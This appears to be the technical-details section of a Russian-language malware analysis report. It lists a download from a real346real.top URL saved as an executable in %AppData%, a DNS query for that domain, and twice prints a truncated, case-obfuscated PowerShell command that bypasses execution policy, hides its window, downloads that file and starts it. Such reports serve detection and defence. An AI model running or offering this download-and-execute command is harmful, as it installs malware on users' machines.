Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PowErsHEll.exe -eXEcutiONPOLicY BYpAsS -NoProfIlE -WInDowsTYLE hIDDEN (nEw-obJEcT SystEm.NeT.WEbcliENT).dOwNloADFILE('http://real346real.top/search.php','%AppdatA%.exe');sTaRt-PRO...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /c "PowErsHEll.exe -eXEcutiONPOLicY BYpAsS -NoProfIlE -WInDowsTYLE hIDDEN (nEw-obJEcT SystEm.NeT.WEbcliENT).dOwNloADFILE('http://real346real.top/search.php','%AppdatA%.exe');sTaRt-PRO...' (со скрытым окном)